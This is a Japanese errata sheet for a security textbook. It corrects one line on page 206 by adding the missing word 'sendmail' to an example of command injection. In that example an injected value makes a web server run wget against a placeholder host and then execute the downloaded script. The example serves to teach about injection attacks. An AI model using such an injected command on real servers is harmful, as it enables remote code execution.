

正 誤 表

下記の部分に誤りがありましたので訂正させていただきます。
ご迷惑をおかけし大変申し訳ございません。

セキュリティ技術の教科書 第2版 第3刷

No	訂正箇所	誤	正
1	P. 206 下から3行目	Web サーバでは, system (“attacker@malicious.com </dev/null; wget http://site/badscrip; sh badscrip #”) ; が実行される。	Web サーバでは, system (“ sendmail attacker@malicious.com </dev/null; wget http://site/badscrip; sh badscrip #”) ; が実 行される。 ※ 「sendmail」と直後の半角アキを追加